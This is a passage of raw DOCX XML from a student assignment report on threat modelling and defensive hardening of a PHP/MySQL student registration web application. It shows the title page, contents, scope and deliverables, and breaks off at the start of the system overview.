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B55031" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="007B5C98">
      <w:pPr>
        <w:spacing w:before="1600"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="71E6042C" w14:textId="77777777" w:rsidR="00267CCC" w:rsidRDefault="00267CCC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3D6D"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13AB86A2" w14:textId="77777777" w:rsidR="00267CCC" w:rsidRDefault="00267CCC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3D6D"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04F8F0C4" w14:textId="77777777" w:rsidR="00267CCC" w:rsidRDefault="00267CCC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3D6D"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78164683" w14:textId="77777777" w:rsidR="00267CCC" w:rsidRDefault="00267CCC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3D6D"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F36FD30" w14:textId="77777777" w:rsidR="00267CCC" w:rsidRDefault="00267CCC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3D6D"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="032693E7" w14:textId="77777777" w:rsidR="00267CCC" w:rsidRDefault="00267CCC" w:rsidP="00A54A5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3D6D"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ED2526D" w14:textId="13321399" w:rsidR="007B5C98" w:rsidRPr="009F728F" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F728F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Secure Design and Implementation of a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B0E548" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="009F728F" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="400"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F728F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Student Registration Web Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E58D225" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="800"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Threat Modelling, Vulnerability Remediation and Defensive Hardening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1082D13A" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IFT 542 Practical Assignment — Technical Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A1543F" w14:textId="2AC87EA2" w:rsidR="007B5C98" w:rsidRPr="00A54A5B" w:rsidRDefault="005830C1" w:rsidP="00A54A5B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2021/1/84369</w:t>
      </w:r>
      <w:r w:rsidR="00A54A5B" w:rsidRPr="00A54A5B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2342187E" w14:textId="77777777" w:rsidR="00A54A5B" w:rsidRDefault="00A54A5B"/>
    <w:p w14:paraId="0C77B1D1" w14:textId="66ED5373" w:rsidR="00A54A5B" w:rsidRDefault="00A54A5B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A74948" w14:textId="77777777" w:rsidR="00A54A5B" w:rsidRPr="00267CCC" w:rsidRDefault="00A54A5B"/>
    <w:p w14:paraId="1929B4E1" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00017F94" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00017F94">
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700CD3DB" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Introduction and </w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37287AA3" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. System Overview and Data Flow Diagram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F57F48" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3. STRIDE Threat Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3320AC3F" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4. Task 2: Authentication Hardening and SQL Injection Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077CC47B" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5. Task 3: Web Application Defences</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588A631F" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>6. Risk Register</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50097E31" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7. Testing and Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173B0727" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>8. Incident Response Runbook (Summary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8E257B" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">9. </w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Limitations and Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E40B002" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>10. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AD0BC6" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:r w:rsidRPr="00267CCC">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A99CF8" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:lastRenderedPageBreak/>
        <w:t>1. Introduction and Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA1FF35" w14:textId="77777777" w:rsidR="00017F94" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This report documents the design, threat modelling, vulnerability remediation and defensive hardening carried out for a PHP/MySQL Student Registration web application, built to satisfy the three tasks of the IFT542 practical assignment: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A47DA8" w14:textId="77777777" w:rsidR="00017F94" w:rsidRDefault="00203D5A" w:rsidP="00017F94">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00017F94">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00017F94">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> STRIDE</w:t>
      </w:r>
      <w:r w:rsidR="00017F94">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">based </w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>threat model of the application's data flows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0598D5DE" w14:textId="77777777" w:rsidR="00017F94" w:rsidRDefault="00203D5A" w:rsidP="00017F94">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00017F94">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00017F94">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dentification and remediation of an authentication weakness and a SQL injection vulnerability, and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF7C178" w14:textId="48682B12" w:rsidR="007B5C98" w:rsidRDefault="00203D5A" w:rsidP="00017F94">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00017F94">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00017F94">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mplementation of broader web application defences covering cross</w:t>
      </w:r>
      <w:r w:rsidR="00017F94">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>site scripting (XSS), cross</w:t>
      </w:r>
      <w:r w:rsidR="00017F94">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>site reques</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>t forgery (CSRF), server</w:t>
      </w:r>
      <w:r w:rsidR="00017F94">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>side request forgery (SSRF), broken access control, security misconfiguration and security event logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BF3FE2" w14:textId="77777777" w:rsidR="00017F94" w:rsidRPr="00267CCC" w:rsidRDefault="00017F94" w:rsidP="00017F94"/>
    <w:p w14:paraId="37C5D73C" w14:textId="17E85208" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The application supports student self</w:t>
      </w:r>
      <w:r w:rsidR="00CB2FED">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>registration, login, profile editing, course enrolment, document upload, and an admini</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>strator area for managing students and courses. It was built from scratch for this assignment (no lecturer</w:t>
      </w:r>
      <w:r w:rsidR="00CB2FED">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">provided starter application was available) using vanilla PHP with PDO for MySQL access, so that every security control described here is visible in </w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>application code rather than hidden inside a framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDEECF1" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>All identifiers, accounts, and log entries used as illustrations in this report are fictitious. No real student data was used at any point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7234B2B6" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:t>1.1 Deliverables Mapped to This Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB8F629" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Section 3 — STRIDE th</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reat model and data flow diagram (Task 1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C88173" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Section 4 — Vulnerability assessment and remediation for authentication and SQL injection, with before/after code (Task 2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1AEA9A" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Section 5 — Defences against XSS, CSRF, SSRF, broken access control, and security misconf</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>iguration, plus security-event logging (Task 3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A6D6E9" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Section 6 — Risk register with likelihood/impact scoring before and after mitigation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158F6EA1" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Section 7 — Test plan and evidence (automated unit tests plus a manual/DB-backed test plan).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A93E2FE" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Section 8 — Incident respons</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>e runbook summary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5677EF35" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:r w:rsidRPr="00267CCC">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5220A24A" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:lastRenderedPageBreak/>
        <w:t>2. System Overview and Data Flow Diagram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FEC926" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The application consists of a PHP application server and a MySQL database, with one outbound integration: an optional “link preview” feature that fetches the page title of an external, allowlist</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
